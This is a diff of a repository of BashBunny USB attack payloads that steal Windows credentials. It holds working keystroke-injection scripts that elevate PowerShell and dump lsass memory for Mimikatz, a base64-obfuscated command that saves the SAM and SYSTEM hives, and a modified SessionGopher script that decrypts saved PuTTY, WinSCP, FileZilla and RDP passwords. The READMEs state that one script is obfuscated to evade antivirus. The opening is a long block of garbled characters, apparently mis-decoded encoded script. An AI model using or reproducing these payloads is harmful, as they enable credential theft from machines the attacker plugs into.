潰敷獲敨汬攮數ⴠ湥䅊睂䡁䅉睢橂䝁䅕督穂䍁䅁児杁䕁䅣党あ䍁䄰䅕祂䝁䄸睙求䡁䅍督杁䝁䅷督桂䡁䅍督㝁䍁䅧杢求䡁䅣兌偂䝁䅉杓䙂䝁䅍䅖杁䍁䅁兓偂䍁䄴睑療䕁䄰䅕祂䝁䅕督穂䝁䅫睢畂䍁䄴䅒求䕁䅙䅢桂䡁䅑党穂䙁䅑杣䙂䕁䅅兔潁䙁䅳睕㕂䡁䅍䅖求䕁䄰杌灂䝁䄸杌瑂䕁䅕兔偂䡁䅉入穂䡁䅑杣求䝁䅅兢摂䙁䅳督婂䙁䅍䅖䙂䕁䄰杌橂䝁䄸杔㉂䕁䅕杣啂䙁䄰杏㙁䕁䅙杣偂䝁䄰杙桂䙁䅍兒㉁䑁䅑睕啂䡁䅉兡畂䝁䅣䅋杁䍁䅣来坂䙁䅙杕楂䑁䅫睢㍂䕁䅕䅓㍁䝁䄴杖ㅁ䡁䅣李䭂䕁䅉兓䭂䕁䅫睢硁䕁䄸党㉁䝁䅧兖桂䙁䅉䅍あ䕁䅣兎偂䝁䅣兒求䝁䄰睒佂䕁䅫兕硂䙁䅅䅎㍁䕁䅣兢祁䕁䄴䅓煂䝁䄸睒灂䡁䅅杤㕁䑁䅫兎㕂䙁䅅䅢䑂䝁䅅兒兂䑁䅙免㉁䙁䅣䅣癁䝁䅯䅏牁䝁䅉杤兂䑁䅕䅏㕁䝁䄴兑䩂䕁䅑兎䩂䕁䅅䅎䝂䝁䄰督㕁䝁䅍䅡獂䡁䅣睋偂䕁䄸李灂䙁䅉兖䥂䡁䅣兢塂䙁䅫䅥偂䕁䅳免塂䕁䄴杣䵂䝁䅙䅕䉂䡁䅕䅡剂䝁䅕睍ぁ䕁䅳兤塂䕁䅣睓㍂䝁䄰䅗㑁䕁䅷睎䉂䙁䅯䅎湂䝁䅙䅖兂䕁䅍兕䡂䙁䅅䅥塂䝁䄰兡浂䕁䅣党婂䕁䅫睎啂䕁䅕睍兂䙁䅯入桂䕁䅍兏煂䑁䅁䅏坂䑁䅙睒䍂䑁䅁杗呂䡁䅑䅒䵂䙁䅍杤佂䑁䅍兒㕂䑁䅕兑䩂䡁䅯兏䑂䙁䅣䅍癁䝁䅑䅢硁䕁䄴兤瑂䙁䅣睑あ䡁䅅来瑂䡁䅫䅢佂䡁䅯杚穁䝁䅣䅚㉂䝁䅳䅔坂䑁䅉杙潂䙁䅧兙噂䡁䅁䅥牂䡁䅕䅥㕁䑁䅣李湂䡁䅕䅚穂䝁䄴李䥂䙁䅍睑浂䙁䅣睢㍂䑁䅫督慂䕁䄰督湂䝁䅕兔噂䙁䅉杣㉂䝁䅅兢佂䙁䅕来䱂䡁䅧睙楂䑁䅁杗㍁䙁䅙䅔㉂䑁䅁杕瑂䡁䅕䅢睂䑁䅕睚療䝁䅉兖潂䕁䅑䅥㉁䑁䅁䅢瑂䕁䅉村睁䝁䅫杍乂䑁䅁睡剂䡁䅁䅖䱂䑁䅑杕灂䝁䅷杢ㅁ䕁䅍睖㑁䕁䅕睤啂䑁䅅䅔䕂䝁䅑䅔祂䙁䅅兢呂䝁䅯䅣楂䑁䅕兙䑂䡁䅉李睂䝁䅳兕㑁䕁䅕党䵂䕁䄰杔㑁䝁䅫兢あ䕁䅉睙硂䑁䅉睑療䡁䅍杣慂䑁䅅睓䱂䡁䅫杣湂䡁䅕村䩂䝁䅑杓坂䡁䅁免㍂䍁䅳兎睂䕁䅷杙療䡁䅍睤睁䕁䄴杍潂䍁䄸睑煂䕁䅣免ㅁ䕁䅙杗慂䍁䄸兤あ䑁䅁睒湂䡁䅑兓塂䙁䅍睎䑂䙁䅁睙䥂䕁䅳䅖啂䙁䅑睙䑂䕁䅑䅓䡂䙁䅣睔瑂䑁䅫杖浂䝁䅷兏䭂䕁䄰免ㅁ䝁䅙睤䥂䑁䅫睕穂䕁䅙兏祂䙁䅙兙婂䡁䅁兣乂䡁䅣睔ㅁ䕁䅙䅏ぁ䕁䅫睍䑂䕁䅉兢䍂䕁䅍䅥硂䝁䅧睑㍁䕁䅷睚䍂䍁䅳督療䝁䅳睒桂䑁䅁睓㕂䡁䅫兔佂䝁䄸䅔坂䕁䅉睤奂䝁䅯睖歂䡁䅅睢ㅁ䑁䅍䅕あ䡁䅫䅕䉂䡁䅁䅚䵂䑁䅑入啂䡁䅍李慂䝁䅍兤㍁䍁䄸睑卂䡁䅑䅏噂䝁䅷䅎噂䕁䅉兙㍂䙁䅫睎啂䝁䅷兖潂䡁䅍睕䝂䡁䅫杓ㅁ䕁䅷兏䵂䑁䅉睒䑂䡁䅕免ㅁ䡁䅕杔潂䝁䅯䅚求䡁䅕睖噂䝁䅍兎㕂䡁䅉睑癁䕁䄰睑乂䕁䅙兗潂䕁䅷兡ぁ䡁䅕村湂䙁䅅来塂䕁䅧䅗㉂䕁䅙杔偂䕁䄴兔䥂䝁䅉睌煂䙁䅯䅕㕂䙁䅉杢䱂䡁䅉杚硂䙁䅁䅖獂䝁䄴兕牂䙁䅧杚煂䝁䅳免䡂䡁䅙睖兂䙁䅯䅒㑁䑁䅅杖歂䙁䅣李硂䑁䅁兒ㅁ䙁䅫兙㕁䝁䅣睓穁䙁䅉䅒㉂䑁䅫杔睁䙁䅣杢㍁䡁䅙杗䝂䡁䅑䅖療䑁䅣免煂䝁䅅杗灂䍁䄸䅍呂䡁䅑睌潂䑁䅧睕硁䡁䅯免睂䕁䅯杍㑁䝁䅣杖䩂䡁䅁睔慂䙁䅯睓㉂䡁䅣党獂䕁䅯杗坂䑁䅙䅏噂䝁䅑睎啂䡁䅁兎硂䕁䄸兏穂䑁䅍条䑂䡁䅁睔灂䑁䅑免婂䡁䅍睔坂䕁䅉䅥療䝁䅫兕硁䕁䄸党穂䑁䅕兗歂䡁䅙杙求䝁䅙䅏䉂䝁䅙兗坂䝁䅧䅖䩂䝁䅅睚硁䝁䅷条橂䡁䅉兖兂䙁䅫睓牁䕁䅫兤偂䕁䅕䅚奂䑁䅣兣䭂䑁䅉兎歂䡁䅯睓浂䝁䅉䅕浂䕁䄸兎煂䙁䅍兒塂䑁䅑杕瑂䕁䄴䅥䕂䡁䅣兣灂䝁䅯兔灂䕁䅧杍穂䕁䅍杔畂䕁䅣兎剂䙁䅅杍祂䑁䅙免睂䝁䅧睓牂䕁䅧睚㕂䙁䅙村畂䡁䅧睡橂䙁䅕䅔祁䕁䅅杚婂䕁䅍来灂䕁䅕睎䵂䝁䅣兕穂䑁䅧睖奂䝁䅑兖剂䝁䄸兤㍂䙁䅕兕䩂䕁䅳兎婂䙁䅍兓灂䕁䅷兙㑁䑁䅍兎㉂䡁䅫兕穁䑁䅑兙療䝁䅍李灂䕁䅯䅒塂䑁䅁杢偂䕁䅍睓卂䝁䅫杖睁䡁䅯䅓ぁ䍁䅳睑䝂䕁䅑杓䙂䙁䅣杢硂䙁䅉䅓瑂䝁䅫杢穂䝁䅯党灂䝁䅫兙兂䝁䅅睔奂䡁䅙兕ㅁ䙁䅧睖楂䡁䅕睒湂䕁䅯杕䵂䕁䅫睌婂䕁䅑杓求䝁䄰䅣祁䕁䅣村㕁䑁䅣入楂䙁䅍兙あ䝁䅍督㍁䙁䅅䅓㙂䝁䅙䅕潂䕁䅑睡求䕁䅫杣慂䑁䅁督佂䡁䅙䅒求䕁䅫兤䉂䝁䅧䅕㕂䡁䅅䅢㍂䡁䅑杚ぁ䕁䅅睊杁䍁䅫䅉獁䙁䅳督㕂䙁䅍䅤求䝁䄰杌䩂䕁䄸杌䑂䕁䄸兢兂䙁䅉党呂䙁䅍兡偂䝁䄴杌橂䝁䄸兢睂䡁䅉兒呂䙁䅍兡偂䕁䄴兔療䕁䅑兒摂䑁䅯杏䕂䝁䅕睑偂䕁䄰䅣祂䝁䅕督呂䍁䅁克㡂䍁䅁杚偂䙁䅉兒桂䝁䅍䅡杁䡁䅳䅉畂䝁䅕睤瑁䕁䄸杙䭂䕁䅕睙啂䍁䅁䅉䩂䝁䄸杌穂䙁䅑杕求䕁䅅兔卂䝁䅕兑歂䝁䅕杕潁䍁䅑睘杁䍁䅷睗穂䡁䅫睕啂䝁䅕兢畁䡁䅑兒㑂䙁䅑杌求䝁䄴睑療䕁䅑兓畂䝁䅣兘㙁䑁䅯兙呂䕁䅍兓䩂䍁䅁克杁䡁䄰克畁䙁䅉兒䉂䕁䅑䅤療䕁䅕杢歂䍁䅧䅉灁䡁䅷兡畂䡁䅙睢䱂䕁䅕兌求䡁䅧䅣卂䕁䅕睕呂䝁䅫睢佂䅁㴽
|
|
@ -0,0 +1,17 @@
|
|||
**Title: MiniDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
What is MiniDumpBunny?
|
||||
#
|
||||
*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.*
|
||||
#
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
|
||||
#
|
||||
Exfiltrate the .dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)
|
After Width: | Height: | Size: 60 KiB |
|
@ -0,0 +1,43 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: MiniDumpBunny
|
||||
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,21 @@
|
|||
**Title: ProcDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
What is ProcDumpBunny?
|
||||
#
|
||||
*It is simple - using a renamed version of procdump - you are able to dump hashes from lsass.exe*
|
||||
#
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
|
||||
Place Bunny.exe in the same payload switch as your payload
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.dmp file and read it with Mimikatz.
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)
|
After Width: | Height: | Size: 8.7 KiB |
After Width: | Height: | Size: 78 KiB |
After Width: | Height: | Size: 61 KiB |
|
@ -0,0 +1,45 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: ProcDumpBunny
|
||||
# Description: Dump lsass.exe with a renamed version of procdump
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
#After you have adapted the delays for your target, add "-W hidden"
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
#Depending on your language - you need to change this - english layout: "Q ALT y" for example
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Bunny.exe -ma lsass.exe out.dmp')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv out.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,24 @@
|
|||
**Title: SamDumpBunny**
|
||||
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
|
||||
**What is SamDumpBunny?**
|
||||
#
|
||||
<p>SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.<br>
|
||||
Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
|
||||
|
||||
|
||||
**Instruction:**
|
||||
1. Plug in your Bashbunny and wait a few seconds
|
||||
|
||||
2. Unzip the exfiltrated zip file onto your machine.
|
||||
|
||||
3. Use a tool like samdump2 or pypykatz on your machine to extract the users hashes.
|
||||
> `samdump2 BunnySys BunnySam`
|
||||
or `pypykatz registry BunnySys --sam BunnySam`
|
||||
|
||||
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
|
||||
|
||||
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
|
|
@ -0,0 +1,53 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: SamDumpBunny
|
||||
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
|
||||
#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
|
||||
Q DELAY 250
|
||||
Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
|
||||
Q DELAY 250
|
||||
Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
|
||||
Q DELAY 250
|
||||
Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
|
||||
Q DELAY 250
|
||||
Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
|
||||
Q DELAY 250
|
||||
Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
|
||||
Q DELAY 250
|
||||
Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
@ -0,0 +1,22 @@
|
|||
**Title: SessionBunny**
|
||||
|
||||
Author: 0i41E
|
||||
(Credit for SessionGopher: Brandon Arvanaghi)
|
||||
|
||||
Version: 1.0
|
||||
|
||||
**Instruction:**
|
||||
|
||||
This payload will run the famous SessionGopher script, which was only slightly modified. Searches for PuTTY, WinSCP, and Remote Desktop saved sessions, decrypts saved passwords for WinSCP,
|
||||
Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords.
|
||||
After you recieve the information, save the items you are interested in simply on your BashBunny.
|
||||
|
||||
#
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Wait for the script to finish and decide what you wanna do with the information gathered
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)
|
|
@ -0,0 +1,948 @@
|
|||
function Invoke-SessionBunny
|
||||
{
|
||||
#>
|
||||
|
||||
[CmdletBinding()] Param (
|
||||
[Parameter(Position = 0, Mandatory = $False)]
|
||||
[String]
|
||||
$Computername,
|
||||
|
||||
[Parameter(Position= 1 , Mandatory = $False)]
|
||||
[String]
|
||||
$Credential,
|
||||
|
||||
[Parameter(Position= 2 , Mandatory = $False)]
|
||||
[Alias("iL")]
|
||||
[String]
|
||||
$Inputlist,
|
||||
|
||||
[Parameter(Position = 3, Mandatory = $False)]
|
||||
[Switch]
|
||||
$AllDomain,
|
||||
|
||||
[Parameter(Position = 4, Mandatory = $False)]
|
||||
[Switch]
|
||||
$Everything,
|
||||
|
||||
[Parameter(Position = 5, Mandatory = $False)]
|
||||
[Switch]
|
||||
$ExcludeDC,
|
||||
|
||||
[Parameter(Position = 6, Mandatory = $False)]
|
||||
[Switch]
|
||||
[Alias("o")]
|
||||
$OutCSV,
|
||||
|
||||
[Parameter(Position=8, Mandatory = $False)]
|
||||
[String]
|
||||
$OutputDirectory = "$pwd\SessionGopher-" + (Get-Date -Format o | foreach {$_ -replace ":", "."})
|
||||
)
|
||||
|
||||
Write-Output '
|
||||
o
|
||||
o
|
||||
o_
|
||||
/ ". SessionGopher
|
||||
," _-" Bunny Edition (0i41E)
|
||||
," m m
|
||||
..+ ) Brandon Arvanaghi
|
||||
`m..m @arvanaghi | arvanaghi.com
|
||||
'
|
||||
$ErrorActionPreference = "SilentlyContinue"
|
||||
#clear error listing
|
||||
$Error.clear()
|
||||
if ($OutCSV) {
|
||||
Write-Verbose "Creating directory $OutputDirectory."
|
||||
New-Item -ItemType Directory $OutputDirectory | Out-Null
|
||||
New-Item ($OutputDirectory + "\PuTTY.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\SuperPuTTY.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\WinSCP.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\FileZilla.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\RDP.csv") -Type File | Out-Null
|
||||
if ($Everything) {
|
||||
New-Item ($OutputDirectory + "\PuTTY ppk Files.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\Microsoft rdp Files.csv") -Type File | Out-Null
|
||||
New-Item ($OutputDirectory + "\RSA sdtid Files.csv") -Type File | Out-Null
|
||||
}
|
||||
}
|
||||
|
||||
if ($Credential) {
|
||||
$Credentials = Get-Credential -Credential $Credential
|
||||
}
|
||||
|
||||
# Value for HKEY_USERS hive
|
||||
$HKU = 2147483651
|
||||
# Value for HKEY_LOCAL_MACHINE hive
|
||||
$HKLM = 2147483650
|
||||
|
||||
$PuTTYPathEnding = "\SOFTWARE\SimonTatham\PuTTY\Sessions"
|
||||
$WinSCPPathEnding = "\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
|
||||
$RDPPathEnding = "\SOFTWARE\Microsoft\Terminal Server Client\Servers"
|
||||
|
||||
if ($Inputlist -or $AllDomain -or $ComputerName) {
|
||||
|
||||
# Whether we read from an input file or query active directory
|
||||
$Reader = ""
|
||||
|
||||
if ($AllDomain) {
|
||||
Write-Verbose "Getting member computers in the domain."
|
||||
$Reader = GetComputersFromActiveDirectory
|
||||
} elseif ($Inputlist) {
|
||||
Write-Verbose "Reading the list of targets."
|
||||
$Reader = Get-Content ((Resolve-Path $Inputlist).Path)
|
||||
} elseif ($ComputerName) {
|
||||
Write-Verbose "Setting target computer as $ComputerName."
|
||||
$Reader = $ComputerName
|
||||
}
|
||||
|
||||
$optionalCreds = @{}
|
||||
if ($Credentials) {
|
||||
$optionalCreds['Credential'] = $Credentials
|
||||
}
|
||||
|
||||
foreach ($RemoteComputer in $Reader) {
|
||||
|
||||
if ($AllDomain) {
|
||||
# Extract just the name from the System.DirectoryServices.SearchResult object
|
||||
$RemoteComputer = $RemoteComputer.Properties.name
|
||||
}
|
||||
if ($RemoteComputer) {
|
||||
Write-Output "Digging on" $RemoteComputer"..."
|
||||
|
||||
$SIDS = Invoke-WmiMethod -Class 'StdRegProv' -Name 'EnumKey' -ArgumentList $HKU,'' -ComputerName $RemoteComputer @optionalCreds | Select-Object -ExpandProperty sNames | Where-Object {$_ -match 'S-1-5-21-[\d\-]+$'}
|
||||
|
||||
foreach ($SID in $SIDs) {
|
||||
|
||||
# Get the username for SID we discovered has saved sessions
|
||||
$MappedUserName = try { (Split-Path -Leaf (Split-Path -Leaf (GetMappedSID))) } catch {}
|
||||
$Source = (($RemoteComputer + "\" + $MappedUserName) -Join "")
|
||||
|
||||
# Created for each user found. Contains all sessions information for that user.
|
||||
$UserObject = New-Object PSObject
|
||||
|
||||
<#
|
||||
PuTTY: contains hostname and usernames
|
||||
SuperPuTTY: contains username, hostname, relevant protocol information, decrypted passwords if stored
|
||||
RDP: contains hostname and username of sessions
|
||||
FileZilla: hostname, username, relevant protocol information, decoded passwords if stored
|
||||
WinSCP: contains hostname, username, protocol, deobfuscated password if stored and no master password used
|
||||
#>
|
||||
$ArrayOfPuTTYSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfSuperPuTTYSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfRDPSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfFileZillaSessions = New-Object System.Collections.ArrayList
|
||||
$ArrayOfWinSCPSessions = New-Object System.Collections.ArrayList
|
||||
|
||||
# Construct tool registry/filesystem paths from SID or username
|
||||
$RDPPath = $SID + $RDPPathEnding
|
||||
$PuTTYPath = $SID + $PuTTYPathEnding
|
||||
$WinSCPPath = $SID + $WinSCPPathEnding
|
||||
$SuperPuTTYFilter = "Drive='C:' AND Path='\\Users\\$MappedUserName\\Documents\\SuperPuTTY\\' AND FileName='Sessions' AND Extension='XML'"
|
||||
$FileZillaFilter = "Drive='C:' AND Path='\\Users\\$MappedUserName\\AppData\\Roaming\\FileZilla\\' AND FileName='sitemanager' AND Extension='XML'"
|
||||
|
||||
$RDPSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$RDPPath @optionalCreds
|
||||
$PuTTYSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$PuTTYPath @optionalCreds
|
||||
$WinSCPSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$WinSCPPath @optionalCreds
|
||||
$SuperPuTTYPath = (Get-WmiObject -Class 'CIM_DataFile' -Filter $SuperPuTTYFilter -ComputerName $RemoteComputer @optionalCreds | Select Name)
|
||||
$FileZillaPath = (Get-WmiObject -Class 'CIM_DataFile' -Filter $FileZillaFilter -ComputerName $RemoteComputer @optionalCreds | Select Name)
|
||||
|
||||
# If any WinSCP saved sessions exist on this box...
|
||||
if (($WinSCPSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
|
||||
Write-Verbose "Found saved WinSCP sessions."
|
||||
# Get all sessions
|
||||
$WinSCPSessions = $WinSCPSessions | Select-Object -ExpandProperty sNames
|
||||
|
||||
foreach ($WinSCPSession in $WinSCPSessions) {
|
||||
|
||||
$WinSCPSessionObject = "" | Select-Object -Property Source,Session,Hostname,Username,Password
|
||||
$WinSCPSessionObject.Source = $Source
|
||||
$WinSCPSessionObject.Session = $WinSCPSession
|
||||
|
||||
$Location = $WinSCPPath + "\" + $WinSCPSession
|
||||
|
||||
$WinSCPSessionObject.Hostname = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"HostName" @optionalCreds).sValue
|
||||
$WinSCPSessionObject.Username = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"UserName" @optionalCreds).sValue
|
||||
$WinSCPSessionObject.Password = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"Password" @optionalCreds).sValue
|
||||
|
||||
if ($WinSCPSessionObject.Password) {
|
||||
|
||||
$MasterPassPath = $SID + "\Software\Martin Prikryl\WinSCP 2\Configuration\Security"
|
||||
|
||||
$MasterPassUsed = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetDWordValue -ArgumentList $HKU,$MasterPassPath,"UseMasterPassword" @optionalCreds).uValue
|
||||
|
||||
if (!$MasterPassUsed) {
|
||||
$WinSCPSessionObject.Password = (DecryptWinSCPPassword $WinSCPSessionObject.Hostname $WinSCPSessionObject.Username $WinSCPSessionObject.Password)
|
||||
} else {
|
||||
$WinSCPSessionObject.Password = "Saved in session, but master password prevents plaintext recovery"
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
[void]$ArrayOfWinSCPSessions.Add($WinSCPSessionObject)
|
||||
|
||||
} # For Each WinSCP Session
|
||||
|
||||
if ($ArrayOfWinSCPSessions.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "WinSCP Sessions" -Value $ArrayOfWinSCPSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfWinSCPSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\WinSCP.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "WinSCP Sessions"
|
||||
$ArrayOfWinSCPSessions | Select-Object * | Format-List | Out-String
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
} # If path to WinSCP exists
|
||||
|
||||
if (($PuTTYSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
|
||||
Write-Verbose "Found saved PuTTY sessions."
|
||||
# Get all sessions
|
||||
$PuTTYSessions = $PuTTYSessions | Select-Object -ExpandProperty sNames
|
||||
|
||||
foreach ($PuTTYSession in $PuTTYSessions) {
|
||||
|
||||
$PuTTYSessionObject = "" | Select-Object -Property Source,Session,Hostname
|
||||
|
||||
$Location = $PuTTYPath + "\" + $PuTTYSession
|
||||
|
||||
$PuTTYSessionObject.Source = $Source
|
||||
$PuTTYSessionObject.Session = $PuTTYSession
|
||||
$PuTTYSessionObject.Hostname = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"HostName" @optionalCreds).sValue
|
||||
|
||||
[void]$ArrayOfPuTTYSessions.Add($PuTTYSessionObject)
|
||||
|
||||
}
|
||||
|
||||
if ($ArrayOfPuTTYSessions.count -gt 0) {
|
||||
|
||||
$UserObject | Add-Member -MemberType NoteProperty -Name "PuTTY Sessions" -Value $ArrayOfPuTTYSessions
|
||||
|
||||
if ($OutCSV) {
|
||||
$ArrayOfPuTTYSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY.csv") -NoTypeInformation
|
||||
} else {
|
||||
Write-Output "PuTTY Sessions"
|
||||
